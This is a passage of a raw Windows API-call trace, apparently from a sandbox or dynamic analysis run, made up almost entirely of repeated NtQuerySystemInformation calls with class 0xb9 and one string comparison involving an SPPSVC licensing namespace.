(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0294.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0294.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0294.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x40, ResultLength=0x0) [0294.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0294.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x28, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e730, Length=0x20, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.205] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x28, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0294.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0294.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e830, Length=0x20, ResultLength=0x0) [0294.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 